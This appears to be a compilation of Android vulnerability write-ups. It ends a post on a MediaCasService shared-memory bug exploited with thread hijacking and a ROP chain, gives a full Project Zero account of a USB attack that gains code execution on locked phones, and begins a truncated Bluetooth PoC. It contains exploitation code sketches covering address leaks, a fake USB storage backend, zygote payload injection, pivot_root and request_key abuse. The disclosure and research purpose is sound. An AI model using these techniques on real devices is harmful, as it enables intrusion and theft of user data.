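static uint64_t find_shm_addr(size_t shm_size)
{
    uint64_t linker_ptr   = read64(shm_size + 0x40);  /* value stored at linker_alloc + 0x40 */
    uint64_t linker_alloc = linker_ptr - 0x10;        /* start of the linker_alloc region */
    return linker_alloc - shm_size;                   /* our mapping sits right before it */
}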

So far we solved the second issue, but have only partially solved the first issue. We do have the address of our shared memory, but not of other interesting data. But what other data are we interested in?

Hijacking a thread

One part of the MediaCasService API is the ability for clients to provide listeners to events. If a client provides a listener, it will be notified when different CAS events occur. A client can also trigger events by its own, which will then be sent back to the listener. The way this works through Binder and HIDL is that when the service sends an event to the listener, it will wait until the listener finished processing the event; a thread will be blocked waiting for the listener.

[Figure: Flow of triggering an event]

This is great for us; we can cause a thread in the service to be blocked waiting for us. Once we have a thread in this state, we can modify its stack in order to hijack it; then, only after we are done, we resume the thread by finishing processing the event. But how do we find the thread stack in memory?

As our deterministic shared memory address is so high, the distance between that address and possible locations of the blocked thread stack is big. The effect of ASLR makes it too unreliable to try to find the thread stack relatively from our deterministic address, so we use another approach. We try to use a bigger shared memory and have it mapped before the blocked thread stack, so we will be able to reach it relatively through the vulnerability.

Instead of only getting one thread to that blocked state, we get multiple (5) threads. This causes more threads to be created, with more thread stacks allocated. By doing this, if there are a few thread-stack-sized gaps in memory, they should be filled, and at least one thread stack in a blocked thread should be mapped at a low address, without any library mapped before it (remember, mmap’s behavior is to map regions at high addresses before low addresses). Then, ideally, if we use a large shared memory, it should be mapped before that.

[Figure: MediaCasService memory map after filling gaps and mapping our shared memory]

One drawback is that there is a chance that other unexpected things (like jemalloc heap) will get mapped in the middle, so the blocked thread stack won’t be where we expect it to be. There could be multiple approaches to solve this. I decided to simply crash the service (using the vulnerability in order to write to an unmapped address) and try again, as every time the service crashes it simply restarts. In any case, this scenario normally does not happen, and even when it does, one retry is usually enough.

Once our shared memory is mapped before the blocked thread stack, we use the vulnerability to read two things from the thread stack:

  • The thread stack address, using pthread metadata which lies in the same memory region after the stack itself.
  • The address where libc is mapped at in order to later build a ROP chain using both gadgets and symbols in libc (libc has enough gadgets). We do this by reading a return address to a specific point in libc, which is in the thread stack.

[Figure: Data read from thread stack]

From now on, we can read and write to the thread stack using the vulnerability. We have both the address of the deterministic shared memory location and the address of the thread stack, so by using the difference between the addresses we can reach the thread stack from our shared memory (the small one with deterministic location).

ROP chain

We have full access to a blocked thread stack which we can resume, so the next step is to execute a ROP chain. We know exactly which part of the stack to overwrite with our ROP chain, as we know the exact state that the thread is blocked at. After overwriting part of the stack, we can resume the thread so the ROP chain is executed.

Unfortunately, the SELinux limitations on this process prevent us from turning this ROP chain into full arbitrary code execution. There is no execmem permission, so anonymous memory cannot be mapped as executable, and we have no control over file types which can be mapped as executable. In this case, the objective is pretty simple (running a single ioctl), so I simply wrote a ROP chain which does this. In theory, if you want to perform more complex stuff, the primitive is so strong that it should still be possible. For instance, if you want to perform complex logic based on a result of a function, you could perform multi-stage ROP: perform one ROP chain which runs that function and writes its result somewhere, read that result, perform the complex logic in your own process and then run another ROP chain based on that.

As was previously mentioned, the objective is to obtain the QSEOS version. Here is the code that is essentially performed by the ROP chain in order to do that:
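(The snippet shown here is an image in the original post; the following is only a rough reconstruction of what the ROP chain boils down to, and the qseecom device path, ioctl name and struct layout are assumptions about the Qualcomm driver rather than verified values.)

/* performed, conceptually, by the hijacked thread inside the service */
int fd = open("/dev/qseecom", O_RDWR);            /* the TEE device node */

struct qseecom_qseos_version_req {                /* assumed layout from the msm qseecom uapi header */
    unsigned int qseos_version;
} req;
ioctl(fd, QSEECOM_IOCTL_GET_QSEOS_VERSION_REQ, &req);

*(unsigned int *)stack_addr = req.qseos_version;  /* drop the result somewhere we can read it back */
sleep(100);                                       /* keep the thread alive, see below */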

stack_addr is the address of the memory region of the stack, which is simply an address that we know is writable and will not be overwritten (the stack begins from the bottom and is not close to the top), so we can write the result to that address and then read it using the vulnerability. The sleep at the end is so the thread will not crash immediately after running the ROP chain, so we can read the result.

Building the ROP chain itself is pretty straightforward. There are enough gadgets in libc to perform it and all the symbols are in libc as well, and we already have libc’s address.

After we are done, the process is left in a bit of an unstable state, as we hijacked a thread to execute our ROP chain. In order to leave everything in a clean state, we simply crash the service using the vulnerability (by writing to an unmapped address) in order to let it restart.

Takeaways

As I previously discussed in my BSidesLV talk and in my previous blog post, Google claims that Project Treble benefits Android security. While that is true in many cases, this vulnerability is another example of how elements of Project Treble could lead to the opposite. This vulnerability is in a library introduced specifically as part of Project Treble, and does not exist in a previous library which does pretty much the same thing. This time, the vulnerability is in a commonly used library, so it affects many high-privileged services.

Full exploit code is available on GitHub. Note: the exploit is only provided for educational or defensive purposes; it is not intended for any malicious or offensive use.

Timeline

 

I would like to thank Google for their quick and professional response, Adam Donenfeld (@doadam), Ori Karliner (@oriHCX), Rani Idan (@raniXCH), Ziggy (@z4ziggy) and the rest of the Zimperium zLabs team.

If you have any questions, you are welcome to DM me on Twitter (@tamir_zb).

OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB

( origin  by Jann Horn, Google Project Zero )

Recently, there has been some attention around the topic of physical attacks on smartphones, where an attacker with the ability to connect USB devices to a locked phone attempts to gain access to the data stored on the device. This blogpost describes how such an attack could have been performed against Android devices (tested with a Pixel 2).

 

After an Android phone has been unlocked once on boot (on newer devices, using the "Unlock for all features and data" screen; on older devices, using the "To start Android, enter your password" screen), it retains the encryption keys used to decrypt files in kernel memory even when the screen is locked, and the encrypted filesystem areas or partition(s) stay accessible. Therefore, an attacker who gains the ability to execute code on a locked device in a sufficiently privileged context can not only backdoor the device, but can also directly access user data.
(Caveat: We have not looked into what happens to work profile data when a user who has a work profile toggles off the work profile.)

 

The bug reports referenced in this blogpost, and the corresponding proof-of-concept code, are available at:
https://bugs.chromium.org/p/project-zero/issues/detail?id=1583 ("directory traversal over USB via injection in blkid output")
https://bugs.chromium.org/p/project-zero/issues/detail?id=1590 ("privesc zygote->init; chain from USB")

 

These issues were fixed as CVE-2018-9445 (fixed at patch level 2018-08-01) and CVE-2018-9488 (fixed at patch level 2018-09-01).

The attack surface

Many Android phones support USB host mode (often using OTG adapters). This allows phones to connect to many types of USB devices (this list isn’t necessarily complete):

 

  • USB sticks: When a USB stick is inserted into an Android phone, the user can copy files between the system and the USB stick. Even if the device is locked, Android versions before P will still attempt to mount the USB stick. (Android 9, which was released after these issues were reported, has logic in vold that blocks mounting USB sticks while the device is locked.)
  • USB keyboards and mice: Android supports using external input devices instead of using the touchscreen. This also works on the lockscreen (e.g. for entering the PIN).
  • USB ethernet adapters: When a USB ethernet adapter is connected to an Android phone, the phone will attempt to connect to a wired network, using DHCP to obtain an IP address. This also works if the phone is locked.

 

This blogpost focuses on USB sticks. Mounting an untrusted USB stick offers nontrivial attack surface in highly privileged system components: The kernel has to talk to the USB mass storage device using a protocol that includes a subset of SCSI, parse its partition table, and interpret partition contents using the kernel’s filesystem implementation; userspace code has to identify the filesystem type and instruct the kernel to mount the device to some location. On Android, the userspace implementation for this is mostly in vold (one of the processes that are considered to have kernel-equivalent privileges), which uses separate processes in restrictive SELinux domains to e.g. determine the filesystem types of partitions on USB sticks.

 

The bug (part 1): Determining partition attributes

When a USB stick has been inserted and vold has determined the list of partitions on the device, it attempts to identify three attributes of each partition: Label (a user-readable string describing the partition), UUID (a unique identifier that can be used to determine whether the USB stick is one that has been inserted into the device before), and filesystem type. In the modern GPT partitioning scheme, these attributes can mostly be stored in the partition table itself; however, USB sticks tend to use the MBR partition scheme instead, which cannot store UUIDs and labels. For normal USB sticks, Android supports both the MBR partition scheme and the GPT partition scheme.

 

To provide the ability to label partitions and assign UUIDs to them even when the MBR partition scheme is used, filesystems implement a hack: The filesystem header contains fields for these attributes, allowing an implementation that has already determined the filesystem type and knows the filesystem header layout of the specific filesystem to extract this information in a filesystem-specific manner. When vold wants to determine label, UUID and filesystem type, it invokes /system/bin/blkid in the blkid_untrusted SELinux domain, which does exactly this: First, it attempts to identify the filesystem type using magic numbers and (failing that) some heuristics, and then, it extracts the label and UUID. It prints the results to stdout in the following format:

 

/dev/block/sda1: LABEL="<label>" UUID="<uuid>" TYPE="<type>"

 

However, the version of blkid used by Android did not escape the label string, and the code responsible for parsing blkid’s output only scanned for the first occurrences of UUID=" and TYPE=". Therefore, by creating a partition with a crafted label, it was possible to gain control over the UUID and type strings returned to vold, which would otherwise always be a valid UUID string and one of a fixed set of type strings.
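
To illustrate why this is exploitable, here is a minimal, self-contained sketch (not the actual vold parser) of what happens when a parser naively scans for the first UUID=" occurrence in unescaped blkid output; the "1234-ABCD" UUID is made up:

#include <stdio.h>
#include <string.h>

int main(void)
{
    /* blkid output for a partition whose 11-byte FAT label is: UUID="../## */
    const char *line =
        "/dev/block/sda1: LABEL=\"UUID=\"../##\" UUID=\"1234-ABCD\" TYPE=\"vfat\"";

    /* Scanning for the first UUID=" lands inside the attacker-controlled label. */
    const char *p = strstr(line, "UUID=\"");
    char uuid[64] = {0};
    sscanf(p + strlen("UUID=\""), "%63[^\"]", uuid);

    printf("parsed UUID: %s\n", uuid);   /* prints: ../## */
    return 0;
}

The real UUID is never reached; whatever the label injects is handed to vold instead.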

The bug (part 2): Mounting the filesystem

When vold has determined that a newly inserted USB stick with an MBR partition table contains a partition of type vfat that the kernel’s vfat filesystem implementation should be able to mount, PublicVolume::doMount() constructs a mount path based on the filesystem UUID, then attempts to ensure that the mountpoint directory exists and has appropriate ownership and mode, and then attempts to mount over that directory:

 

    if (mFsType != "vfat") {
        LOG(ERROR) << getId() << " unsupported filesystem " << mFsType;
        return -EIO;
    }
    if (vfat::Check(mDevPath)) {
        LOG(ERROR) << getId() << " failed filesystem check";
        return -EIO;
    }
    // Use UUID as stable name, if available
    std::string stableName = getId();
    if (!mFsUuid.empty()) {
        stableName = mFsUuid;
    }
    mRawPath = StringPrintf("/mnt/media_rw/%s", stableName.c_str());
    […]
    if (fs_prepare_dir(mRawPath.c_str(), 0700, AID_ROOT, AID_ROOT)) {
        PLOG(ERROR) << getId() << " failed to create mount points";
        return -errno;
    }
    if (vfat::Mount(mDevPath, mRawPath, false, false, false,
            AID_MEDIA_RW, AID_MEDIA_RW, 0007, true)) {
        PLOG(ERROR) << getId() << " failed to mount " << mDevPath;
        return -EIO;
    }

 

The mount path is determined using a format string, without any sanity checks on the UUID string that was provided by blkid. Therefore, an attacker with control over the UUID string can perform a directory traversal attack and cause the FAT filesystem to be mounted outside of /mnt/media_rw.

 

This means that if an attacker inserts a USB stick with a FAT filesystem whose label string is 'UUID="../##' into a locked phone, the phone will mount that USB stick to /mnt/##.

 

However, this straightforward implementation of the attack has several severe limitations; some of them can be overcome, and others can be worked around:

 

  • Label string length: A FAT filesystem label is limited to 11 bytes. An attacker attempting to perform a straightforward attack needs to use the six bytes 'UUID="' to start the injection, which leaves only five characters for the directory traversal — insufficient to reach any interesting point in the mount hierarchy. The next section describes how to work around that.
  • SELinux restrictions on mountpoints: Even though vold is considered to be kernel-equivalent, a SELinux policy applies some restrictions on what vold can do. Specifically, the mounton permission is restricted to a set of permitted labels.
  • Writability requirement: fs_prepare_dir() fails if the target directory is not mode 0700 and chmod() fails.
  • Restrictions on access to vfat filesystems: When a vfat filesystem is mounted, all of its files are labeled as u:object_r:vfat:s0. Even if the filesystem is mounted in a place from which important code or data is loaded, many SELinux contexts won’t be permitted to actually interact with the filesystem — for example, the zygote and system_server aren’t allowed to do so. On top of that, processes that don’t have sufficient privileges to bypass DAC checks also need to be in the media_rw group. The section "Dealing with SELinux: Triggering the bug twice" describes how these restrictions can be avoided in the context of this specific bug.

Exploitation: Chameleonic USB mass storage

As described in the previous section, a FAT filesystem label is limited to 11 bytes. blkid supports a range of other filesystem types that have significantly longer label strings, but if you used such a filesystem type, you’d then have to make it past the fsck check for vfat filesystems and the filesystem header checks performed by the kernel when mounting a vfat filesystem. The vfat kernel filesystem doesn’t require a fixed magic value right at the start of the partition, so this might theoretically work somehow; however, because several of the values in a FAT filesystem header are actually important for the kernel, and at the same time, blkid also performs some sanity checks on superblocks, the PoC takes a different route.

 

After blkid has read parts of the filesystem and used them to determine the filesystem’s type, label and UUID, fsck_msdos and the in-kernel filesystem implementation will re-read the same data, and those repeated reads actually go through to the storage device. The Linux kernel caches block device pages when userspace directly interacts with block devices, but __blkdev_put() removes all cached data associated with a block device when the last open file referencing the device is closed.

 

A physical attacker can abuse this by attaching a fake storage device that returns different data for multiple reads from the same location. This allows us to present, for example, a romfs header with a long label string to blkid while presenting a perfectly normal vfat filesystem to fsck_msdos and the in-kernel filesystem implementation.

 

This is relatively simple to implement in practice thanks to Linux’ built-in support for device-side USB. Andrzej Pietrasiewicz’s talk "Make your own USB gadget" is a useful introduction to this topic. Basically, the kernel ships with implementations for device-side USB mass storage, HID devices, ethernet adapters, and more; using a relatively simple pseudo-filesystem-based configuration interface, you can configure a composite gadget that provides one or multiple of these functions, potentially with multiple instances, to the connected device. The hardware you need is a system that runs Linux and supports device-side USB; for testing this attack, a Raspberry Pi Zero W was used.

 

The f_mass_storage gadget function is designed to use a normal file as backing storage; to be able to interactively respond to requests from the Android phone, a FUSE filesystem is used as backing storage instead, using the direct_io option / the FOPEN_DIRECT_IO flag to ensure that our own kernel doesn’t add unwanted caching.
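
A heavily simplified sketch of that idea is shown below, assuming libfuse3’s high-level API (compile with pkg-config fuse3); all names, sizes and magic bytes are placeholders and the real PoC is considerably more involved. It exposes a single backing file whose first sector changes content between the first and subsequent reads:

/* Chameleonic backing store sketch: first read of sector 0 looks like a romfs
 * (long label for blkid), later reads look like a vfat boot sector. */
#define FUSE_USE_VERSION 31
#include <fuse.h>
#include <sys/stat.h>
#include <string.h>
#include <errno.h>

#define IMG_SIZE (64 * 1024 * 1024)
static int read_count;

static int cham_getattr(const char *path, struct stat *st, struct fuse_file_info *fi)
{
    (void) fi;
    memset(st, 0, sizeof(*st));
    if (strcmp(path, "/") == 0) {
        st->st_mode = S_IFDIR | 0755;
        st->st_nlink = 2;
    } else if (strcmp(path, "/backing.img") == 0) {
        st->st_mode = S_IFREG | 0644;
        st->st_nlink = 1;
        st->st_size = IMG_SIZE;
    } else {
        return -ENOENT;
    }
    return 0;
}

static int cham_open(const char *path, struct fuse_file_info *fi)
{
    if (strcmp(path, "/backing.img") != 0)
        return -ENOENT;
    fi->direct_io = 1;   /* FOPEN_DIRECT_IO: no caching on our side */
    return 0;
}

static int cham_read(const char *path, char *buf, size_t size, off_t off,
                     struct fuse_file_info *fi)
{
    (void) path; (void) fi;
    memset(buf, 0, size);
    if (off == 0) {
        /* The real PoC keys its responses on the observed read pattern,
         * not on a simple counter; the magic bytes here are placeholders. */
        if (read_count++ == 0)
            memcpy(buf, "-rom1fs-", size < 8 ? size : 8);        /* romfs magic */
        else
            memcpy(buf, "\xeb\x3c\x90MSDOS5.0", size < 11 ? size : 11); /* FAT boot sector start */
    }
    return size;
}

static const struct fuse_operations cham_ops = {
    .getattr = cham_getattr,
    .open    = cham_open,
    .read    = cham_read,
};

int main(int argc, char *argv[])
{
    return fuse_main(argc, argv, &cham_ops, NULL);
}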

 

At this point, it is already possible to implement an attack that can steal, for example, photos stored on external storage. Luckily for an attacker, immediately after a USB stick has been mounted, com.android.externalstorage/.MountReceiver is launched, which is a process whose SELinux domain permits access to USB devices. So after a malicious FAT partition has been mounted over /data (using the label string 'UUID="../../data'), the zygote forks off a child with appropriate SELinux context and group membership to permit accesses to USB devices. This child then loads bytecode from /data/dalvik-cache/, permitting us to take control over com.android.externalstorage, which has the necessary privileges to exfiltrate external storage contents.

 

However, for an attacker who wants to access not just photos, but things like chat logs or authentication credentials stored on the device, this level of access should normally not be sufficient on its own.

Dealing with SELinux: Triggering the bug twice

The major limiting factor at this point is that, even though it is possible to mount over /data, a lot of the highly-privileged code running on the device is not permitted to access the mounted filesystem. However, one highly-privileged service does have access to it: vold.

 

vold actually supports two types of USB sticks, PublicVolume and PrivateVolume. Up to this point, this blogpost focused on PublicVolume; from here on, PrivateVolume becomes important.
A PrivateVolume is a USB stick that must be formatted using a GUID Partition Table. It must contain a partition that has type UUID kGptAndroidExpand (193D1EA4-B3CA-11E4-B075-10604B889DCF), which contains a dm-crypt-encrypted ext4 (or f2fs) filesystem. The corresponding key is stored at /data/misc/vold/expand_{partGuid}.key, where {partGuid} is the partition GUID from the GPT table as a normalized lowercase hexstring.

 

As an attacker, you normally shouldn’t be able to mount an ext4 filesystem this way, because phones aren’t usually set up with any such keys; and even if there is such a key, you’d still have to know what the correct partition GUID is and what the key is. However, we can mount a vfat filesystem over /data/misc and put our own key there, for our own GUID. Then, while the first malicious USB mass storage device is still connected, we can connect a second one that is mounted as PrivateVolume using the keys vold will read from the first USB mass storage device. (Technically, the ordering in the last sentence isn’t entirely correct — actually, the exploit provides both mass storage devices as a single composite device at the same time, but stalls the first read from the second mass storage device to create the desired ordering.)

 

Because PrivateVolume instances use ext4, we can control DAC ownership and permissions on the filesystem; and thanks to the way a PrivateVolume is integrated into the system, we can even control SELinux labels on that filesystem.

 

In summary, at this point, we can mount a controlled filesystem over /data, with arbitrary file permissions and arbitrary SELinux contexts. Because we control file permissions and SELinux contexts, we can allow any process to access files on our filesystem — including mapping them with PROT_EXEC.

Injecting into zygote

The zygote process is relatively powerful, even though it is not listed as part of the TCB. By design, it runs with UID 0, can arbitrarily change its UID, and can perform dynamic SELinux transitions into the SELinux contexts of system_server and normal apps. In other words, the zygote has access to almost all user data on the device.

 

When the 64-bit zygote starts up on system boot, it loads code from /data/dalvik-cache/arm64/system@framework@boot*.{art,oat,vdex}. Normally, the oat file (which contains an ELF library that will be loaded with dlopen()) and the vdex file are symlinks to files on the immutable /system partition; only the art file is actually stored on /data. But we can instead make system@framework@boot.art and system@framework@boot.vdex symlinks to /system (to get around some consistency checks without knowing exactly which Android build is running on the device) while placing our own malicious ELF library at system@framework@boot.oat (with the SELinux context that the legitimate oat file would have). Then, by placing a function with __attribute__((constructor)) in our ELF library, we can get code execution in the zygote as soon as it calls dlopen() on startup.
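
A minimal sketch of such a payload library is shown below (the marker file and its path are purely illustrative); when the zygote dlopen()s the fake oat file, the constructor runs before anything else:

/* Build as a shared object, e.g.:
 *   aarch64-linux-android-gcc -shared -fPIC -o payload.so payload.c */
#include <stdio.h>
#include <unistd.h>

__attribute__((constructor))
static void on_load(void)
{
    /* Runs inside the 64-bit zygote as soon as dlopen() loads this library. */
    FILE *f = fopen("/data/local/tmp/zygote_marker", "w");   /* placeholder action */
    if (f) {
        fprintf(f, "constructor ran as uid %d\n", (int) getuid());
        fclose(f);
    }
}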

 

The missing step at this point is that when the attack is performed, the zygote is already running; and this attack only works while the zygote is starting up.

Crashing the system

This part is a bit unpleasant.

 

When a critical system component (in particular, the zygote or system_server) crashes (which you can simulate on an eng build using kill), Android attempts to automatically recover from the crash by restarting most userspace processes (including the zygote). When this happens, the screen first shows the boot animation for a bit, followed by the lock screen with the "Unlock for all features and data" prompt that normally only shows up after boot. However, the key material for accessing user data is still present at this point, as you can verify if ADB is on by running "ls /sdcard" on the device.

 

This means that if we can somehow crash system_server, we can then inject code into the zygote during the following userspace restart and will be able to access user data on the device.

 

Of course, mounting our own filesystem over /data is very crude and makes all sorts of things fail, but surprisingly, the system doesn’t immediately fall over — while parts of the UI become unusable, most places have enough error handling that the system doesn’t fail severely enough to trigger a restart.
After some experimentation, it turned out that Android’s code for tracking bandwidth usage has a safety check: If the network usage tracking code can’t write to disk and >=2MiB (mPersistThresholdBytes) of network traffic have been observed since the last successful write, a fatal exception is thrown. This means that if we can create some sort of network connection to the device and then send it >=2MiB worth of ping flood, then trigger a stats writeback by either waiting for a periodic writeback or changing the state of a network interface, the device will reboot.

 

To create a network connection, there are two options:

 

  • Connect to a wifi network. Before Android 9, even when the device is locked, it is normally possible to connect to a new wifi network by dragging down from the top of the screen, tapping the drop-down below the wifi symbol, then tapping on the name of an open wifi network. (This doesn’t work for networks protected with WPA, but of course an attacker can make their own wifi network an open one.) Many devices will also just autoconnect to networks with certain names.
  • Connect to an ethernet network. Android supports USB ethernet adapters and will automatically connect to ethernet networks.

 

For testing the exploit, a manually-created connection to a wifi network was used; for a more reliable and user-friendly exploit, you’d probably want to use an ethernet connection.

 

At this point, we can run arbitrary native code in zygote context and access user data; but we can’t yet read out the raw disk encryption key, directly access the underlying block device, or take a RAM dump (although at this point, half the data that would’ve been in a RAM dump is probably gone anyway thanks to the system crash). If we want to be able to do those things, we’ll have to escalate our privileges a bit more.

From zygote to vold

Even though the zygote is not supposed to be part of the TCB, it has access to the CAP_SYS_ADMIN capability in the initial user namespace, and the SELinux policy permits the use of this capability. The zygote uses this capability for the mount() syscall and for installing a seccomp filter without setting the NO_NEW_PRIVS flag. There are multiple ways to abuse CAP_SYS_ADMIN; in particular, on the Pixel 2, the following ways seem viable:

 

  • You can install a seccomp filter without NO_NEW_PRIVS, then perform an execve() with a privilege transition (SELinux exec transition, setuid/setgid execution, or execution with permitted file capability set). The seccomp filter can then force specific syscalls to fail with error number 0 — which e.g. in the case of open() means that the process will believe that the syscall succeeded and allocated file descriptor 0. This attack works here, but is a bit messy.
  • You can instruct the kernel to use a file you control as high-priority swap device, then create memory pressure. Once the kernel writes stack or heap pages from a sufficiently privileged process into the swap file, you can edit the swapped-out memory, then let the process load it back. Downsides of this technique are that it is very unpredictable, it involves memory pressure (which could potentially cause the system to kill processes you want to keep, and probably destroys many forensic artifacts in RAM), and requires some way to figure out which swapped-out pages belong to which process and are used for what. This requires the kernel to support swap.
  • You can use pivot_root() to replace the root directory of either the current mount namespace or a newly created mount namespace, bypassing the SELinux checks that would have been performed for mount(). Doing it for a new mount namespace is useful if you only want to affect a child process that elevates its privileges afterwards. This doesn’t work if the root filesystem is a rootfs filesystem. This is the technique used here.

 

In recent Android versions, the mechanism used to create dumps of crashing processes has changed: Instead of asking a privileged daemon to create a dump, processes execute one of the helpers /system/bin/crash_dump64 and /system/bin/crash_dump32, which have the SELinux label u:object_r:crash_dump_exec:s0. Currently, when a file with such a label is executed by any SELinux domain, an automatic domain transition to the crash_dump domain is triggered (which automatically implies setting the AT_SECURE flag in the auxiliary vector, instructing the linker of the new process to be careful with environment variables like LD_PRELOAD):

 

domain_auto_trans(domain, crash_dump_exec, crash_dump);

 

At the time this bug was reported, the crash_dump domain had the following SELinux policy:

 

[…]
allow crash_dump {
 domain
 -init
 -crash_dump
 -keystore
 -logd
}:process { ptrace signal sigchld sigstop sigkill };
[…]
r_dir_file(crash_dump, domain)
[…]

 

This policy permitted crash_dump to attach to processes in almost any domain via ptrace() (providing the ability to take over the process if the DAC controls permit it) and allowed it to read properties of any process in procfs. The exclusion list for ptrace access lists a few TCB processes; but notably, vold was not on the list. Therefore, if we can execute crash_dump64 and somehow inject code into it, we can then take over vold.

 

Note that the ability to actually ptrace() a process is still gated by the normal Linux DAC checks, and crash_dump can’t use CAP_SYS_PTRACE or CAP_SETUID. If a normal app managed to inject code into crash_dump64, it still wouldn’t be able to leverage that to attack system components because of the UID mismatch.

 

If you’ve been reading carefully, you might now wonder whether we could just place our own binary with context u:object_r:crash_dump_exec:s0 on our fake /data filesystem, and then execute that to gain code execution in the crash_dump domain. This doesn’t work because vold — very sensibly — hardcodes the MS_NOSUID flag when mounting USB storage devices, which not only degrades the execution of classic setuid/setgid binaries, but also degrades the execution of files with file capabilities and executions that would normally involve automatic SELinux domain transitions (unless the SELinux policy explicitly opts out of this behavior by granting PROCESS2__NOSUID_TRANSITION).

 

To inject code into crash_dump64, we can create a new mount namespace with unshare() (using our CAP_SYS_ADMIN capability), then call pivot_root() to point the root directory of our process into a directory we fully control, and then execute crash_dump64. Then the kernel parses the ELF headers of crash_dump64, reads the path to the linker (/system/bin/linker64), loads the linker into memory from that path (relative to the process root, so we can supply our own linker here), and executes it.
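
A rough sketch of the mount-namespace part of this step follows. It only demonstrates the unshare()/pivot_root() mechanics under the assumption that we already run with CAP_SYS_ADMIN; the fake root path is a placeholder, and the real exploit additionally has to keep the genuine crash_dump64 reachable under the new root (e.g. via bind mounts) so that the SELinux exec transition still triggers:

#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mount.h>
#include <sys/syscall.h>
#include <unistd.h>

static void die(const char *what) { perror(what); exit(1); }

int main(void)
{
    const char *newroot = "/data/local/tmp/fakeroot";  /* placeholder, fully attacker-controlled */

    if (unshare(CLONE_NEWNS))                              die("unshare");
    /* Make mount changes private to our new namespace. */
    if (mount(NULL, "/", NULL, MS_REC | MS_PRIVATE, NULL)) die("make-private");
    /* pivot_root() needs the new root to be a mount point. */
    if (mount(newroot, newroot, NULL, MS_BIND, NULL))      die("bind");
    if (chdir(newroot))                                    die("chdir");
    /* put_old == new_root is allowed; the old root ends up stacked underneath. */
    if (syscall(SYS_pivot_root, ".", "."))                 die("pivot_root");
    if (umount2(".", MNT_DETACH))                          die("umount old root");

    /* From here on, /system/bin/linker64 resolves inside our fake root. */
    execl("/system/bin/crash_dump64", "crash_dump64", (char *)NULL);
    die("execl");
    return 1;
}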

 

At this point, we can execute arbitrary code in crash_dump context and escalate into vold from there, compromising the TCB. At this point, Android’s security policy considers us to have kernel-equivalent privileges; however, to see what you’d have to do from here to gain code execution in the kernel, this blogpost goes a bit further.

From vold to init context

It doesn’t look like there is an easy way to get from vold into the real init process; however, there is a way into the init SELinux context. Looking through the SELinux policy for allowed transitions into init context, we find the following policy:

 

domain_auto_trans(kernel, init_exec, init)

 

This means that if we can get code running in kernel context to execute a file we control labeled init_exec, on a filesystem that wasn’t mounted with MS_NOSUID, then our file will be executed in init context.

 

The only code that is running in kernel context is the kernel, so we have to get the kernel to execute the file for us. Linux has a mechanism called "usermode helpers" that can do this: Under some circumstances, the kernel will delegate actions (such as creating coredumps, loading key material into the kernel, performing DNS lookups, …) to userspace code. In particular, when a nonexistent key is looked up (e.g. via request_key()), /sbin/request-key (hardcoded, can only be changed to a different static path at kernel build time with CONFIG_STATIC_USERMODEHELPER_PATH) will be invoked.

 

Being in vold, we can simply mount our own ext4 filesystem over /sbin without MS_NOSUID, then call request_key(), and the kernel invokes our request-key in init context.
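
A minimal sketch of that trigger, assuming we already run as vold with a prepared ext4 image whose request-key binary carries the init_exec label (the loop device path and the key description are placeholders):

#define _GNU_SOURCE
#include <stdio.h>
#include <sys/mount.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(void)
{
    /* Mount our ext4 image over /sbin, notably without MS_NOSUID. */
    if (mount("/dev/block/loop7", "/sbin", "ext4", 0, NULL)) {
        perror("mount over /sbin");
        return 1;
    }

    /* Looking up a key that does not exist makes the kernel spawn
     * /sbin/request-key (now our binary) in init context. */
    syscall(SYS_request_key, "user", "totally-missing-key", NULL, 0);
    return 0;
}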

 

The exploit stops at this point; however, the following section describes how you could build on it to gain code execution in the kernel.

From init context to the kernel

From init context, it is possible to transition into modprobe or vendor_modprobe context by executing an appropriately labeled file after explicitly requesting a domain transition (note that this is domain_trans(), which permits a transition on exec, not domain_auto_trans(), which automatically performs a transition on exec):

 

domain_trans(init, { rootfs toolbox_exec }, modprobe)
domain_trans(init, vendor_toolbox_exec, vendor_modprobe)

 

modprobe and vendor_modprobe have the ability to load kernel modules from appropriately labeled files:

 

allow modprobe self:capability sys_module;
allow modprobe { system_file }:system module_load;
allow vendor_modprobe self:capability sys_module;
allow vendor_modprobe { vendor_file }:system module_load;

 

Android nowadays doesn’t require signatures for kernel modules:

 

walleye:/ # zcat /proc/config.gz | grep MODULE
CONFIG_MODULES_USE_ELF_RELA=y
CONFIG_MODULES=y
# CONFIG_MODULE_FORCE_LOAD is not set
CONFIG_MODULE_UNLOAD=y
CONFIG_MODULE_FORCE_UNLOAD=y
CONFIG_MODULE_SRCVERSION_ALL=y
# CONFIG_MODULE_SIG is not set
# CONFIG_MODULE_COMPRESS is not set
CONFIG_MODULES_TREE_LOOKUP=y
CONFIG_ARM64_MODULE_CMODEL_LARGE=y
CONFIG_ARM64_MODULE_PLTS=y
CONFIG_RANDOMIZE_MODULE_REGION_FULL=y
CONFIG_DEBUG_SET_MODULE_RONX=y

 

Therefore, you could execute an appropriately labeled file to execute code in modprobe context, then load an appropriately labeled malicious kernel module from there.
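
Since module signature enforcement is disabled, that final step would boil down to something like the following sketch from modprobe context (the module path is a placeholder; per the policy above, the .ko has to carry a system_file or vendor_file label):

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(void)
{
    int fd = open("/data/local/tmp/evil.ko", O_RDONLY | O_CLOEXEC);  /* placeholder path */
    if (fd < 0) {
        perror("open module");
        return 1;
    }
    /* finit_module(2) loads the module from the open fd; requires CAP_SYS_MODULE. */
    if (syscall(SYS_finit_module, fd, "", 0)) {
        perror("finit_module");
        return 1;
    }
    return 0;
}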

Lessons learned

Notably, this attack crosses two weakly-enforced security boundaries: the boundary from blkid_untrusted to vold (when vold uses the UUID provided by blkid_untrusted in a pathname without checking that it resembles a valid UUID) and the boundary from the zygote to the TCB (by abusing the zygote’s CAP_SYS_ADMIN capability). Software vendors have, very rightly, been stressing for quite some time that it is important for security researchers to be aware of what is, and what isn’t, a security boundary — but it is also important for vendors to decide where they want to have security boundaries and then rigorously enforce those boundaries. Unenforced security boundaries can be of limited use (for example, as a development aid while stronger isolation is in development), but they can also have negative effects by obfuscating how important a component is for the security of the overall system.

In this case, the weakly-enforced security boundary between vold and blkid_untrusted actually contributed to the vulnerability, rather than mitigating it. If the blkid code had run in the vold process, it would not have been necessary to serialize its output, and the injection of a fake UUID would not have worked.

PoC for Android Bluetooth bug CVE-2018-9355

CVE-2018-9355 A-74016921 RCE Critical 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, 8.1
/*
 *  This program is free software; you can redistribute it and/or modify
